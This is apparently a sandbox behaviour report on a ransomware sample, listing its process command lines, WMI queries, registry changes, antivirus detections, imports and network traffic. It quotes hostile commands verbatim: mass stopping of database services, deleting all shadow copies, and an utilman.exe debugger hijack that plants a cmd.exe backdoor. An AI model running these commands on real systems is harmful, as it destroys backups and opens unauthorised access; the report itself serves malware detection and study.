Creates a suspicious process (11 个事件)
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
cmdline "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
cmdline powershell.exe -NoExit -Command -
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
Executes one or more WMI queries (9 个事件)
wmi SELECT * FROM Win32_Service WHERE name like '%%MySQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%firebird%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLAgent%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%MSSQL%%'
wmi SELECT * FROM Win32_ShadowCopy
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLWriter%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%ReportServer%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLBrowser%%'
Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 个事件)
Time & API Arguments Status Return Repeated
1619432270.986086
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619432294.63743
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619432299.514258
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
Uses Windows utilities for basic Windows functionality (14 个事件)
cmdline "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
cmdline "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
cmdline "C:\Windows\system32\net.exe" view OSKAR-PC
cmdline "C:\Windows\system32\net.exe" view
cmdline "C:\Windows\system32\net.exe" view SANDBOXSandboxserverSambaUbuntu
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
cmdline "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Installs itself for autorun at Windows startup (2 个事件)
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger reg_value %windir%\system32\cmd.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger reg_value Hotkey Disabled
One or more non-safelisted processes were created (15 个事件)
parent_process powershell.exe martian_process "C:\Windows\system32\net.exe" view OSKAR-PC
parent_process powershell.exe martian_process "C:\Windows\system32\net.exe" view
parent_process powershell.exe martian_process "C:\Windows\system32\net.exe" view SANDBOXSandboxserverSambaUbuntu
parent_process powershell.exe martian_process "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
parent_process powershell.exe martian_process "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
Uses suspicious command line tools or Windows utilities (1 个事件)
cmdline "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
The process powershell.exe wrote an executable file to disk (4 个事件)
file C:\Windows\System32\net.exe
file C:\Windows\System32\wbem\WMIC.exe
file C:\Windows\System32\vssadmin.exe
file C:\Windows\System32\reg.exe
Detects the presence of Wine emulator (1 个事件)
Time & API Arguments Status Return Repeated
1619426979.831241
LdrGetProcedureAddress
ordinal: 0
module: ntdll
module_address: 0x77d30000
function_address: 0x0018fe3d
function_name: wine_get_version
failed 3221225785 0
Executes one or more WMI queries which can be used to create or modify services (8 个事件)
wmi SELECT * FROM Win32_Service WHERE name like '%%MySQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%firebird%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLAgent%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%MSSQL%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLWriter%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%ReportServer%%'
wmi SELECT * FROM Win32_Service WHERE name like '%%SQLBrowser%%'
File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Betacio.381
FireEye Generic.mg.4e3500cae131418b
ALYac Trojan.Ransom.Filecoder
Cylance Unsafe
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/Filecoder.f93e18b3
K7GW Riskware ( 0040eff71 )
Cybereason malicious.ae1314
Arcabit Trojan.Betacio.381
Symantec Downloader
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Packed.Generic-7647403-0
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Variant.Betacio.381
NANO-Antivirus Trojan.Win32.Filecoder.hhaejw
Paloalto generic.ml
AegisLab Trojan.Win32.Generic.4!c
Tencent Win32.Trojan.Filecoder.Pegb
Ad-Aware Gen:Variant.Betacio.381
Sophos Mal/Generic-S
Comodo Malware@#2bv4vk27ucxsw
F-Secure Trojan.TR/Crypt.XPACK.Gen
DrWeb Trojan.Encoder.31607
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_FRS.0NA103L920
McAfee-GW-Edition BehavesLike.Win32.VirRansom.vh
Emsisoft Gen:Variant.Betacio.381 (B)
Ikarus Trojan-Ransom.FileCrypter
Jiangmin Trojan.Generic.eogjl
Avira TR/Crypt.XPACK.Gen
Microsoft Trojan:Win32/Occamy.C25
ZoneAlarm HEUR:Trojan.Win32.Generic
GData Gen:Variant.Betacio.381
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Agent.C4176348
McAfee GenericRXAA-AA!4E3500CAE131
MAX malware (ai score=100)
VBA32 Trojan.Encoder
ESET-NOD32 a variant of Win32/Filecoder.GoGoogle.A
TrendMicro-HouseCall TROJ_FRS.0NA103L920
Rising Trojan.Generic@ML.95 (RDMK:n0DvQiEau/moevd+n0ICkQ)
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.7164915.susgen
Fortinet W32/Crypt.BC0D!tr.ransom
BitDefenderTheta Gen:NN.ZexaF.34700.zwW@ae0691g
AVG Win32:Malware-gen
Panda Trj/Genetic.gen
Qihoo-360 Win32/Trojan.e6d
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1970-01-01 08:00:00

Imports

Library kernel32.dll:
0x652020 WriteFile
0x652024 WriteConsoleW
0x65202c WaitForSingleObject
0x652030 VirtualQuery
0x652034 VirtualFree
0x652038 VirtualAlloc
0x65203c SwitchToThread
0x652040 SuspendThread
0x652044 SetWaitableTimer
0x652050 SetEvent
0x652054 SetErrorMode
0x65205c ResumeThread
0x652064 LoadLibraryA
0x652068 LoadLibraryW
0x65206c SetThreadContext
0x652070 GetThreadContext
0x652074 GetSystemInfo
0x652078 GetSystemDirectoryA
0x65207c GetStdHandle
0x652088 GetProcAddress
0x652090 GetConsoleMode
0x652098 ExitProcess
0x65209c DuplicateHandle
0x6520a0 CreateThread
0x6520a8 CreateEventA
0x6520ac CloseHandle

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49177 192.168.56.1 139
192.168.56.101 49178 192.168.56.1 139

UDP

Source Source Port Destination Destination Port
192.168.56.1 137 192.168.56.101 137
192.168.56.1 138 192.168.56.101 138
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.